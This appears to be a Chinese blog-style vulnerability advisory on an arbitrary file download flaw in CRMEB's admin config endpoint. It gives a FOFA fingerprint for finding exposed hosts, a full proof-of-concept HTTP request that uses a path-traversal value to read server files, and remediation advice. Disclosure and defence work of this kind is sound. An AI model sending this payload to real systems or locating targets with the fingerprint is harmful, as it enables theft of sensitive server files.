问题描述
该问题存在于CRMEB的文件下载功能中,由于未对用户输入的文件路径进行严格校验,攻击者可以通过构造恶意请求,下载服务器上的任意文件。这可能导致服务器上的敏感文件(如配置文件、数据库文件等)被泄露。
app/adminapi/controller/v1/setting/SystemConfig.php路由中存在任意文件下载
fofa
icon_hash="-847565074"
poc
POST /adminapi/setting/config/save_basics HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Authori-zation:
Cookie: cb_lang=zh-cn;
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Content-Type: application/json;charset=utf-8
Content-Length: 72
{
"weixin_ckeck_file": "../../../../../../../../Windows/win.ini"
}
修复建议
- 输入验证:对用户输入的文件路径进行严格校验,确保只能访问允许的文件。
- 文件路径白名单:限制文件下载功能只能访问特定的目录或文件类型。
- 权限控制:确保文件下载功能只能由授权用户访问,避免未授权用户利用该功能。
- 更新补丁:及时关注CRMEB官方发布的安全补丁,并尽快应用。
738

被折叠的 条评论
为什么被折叠?



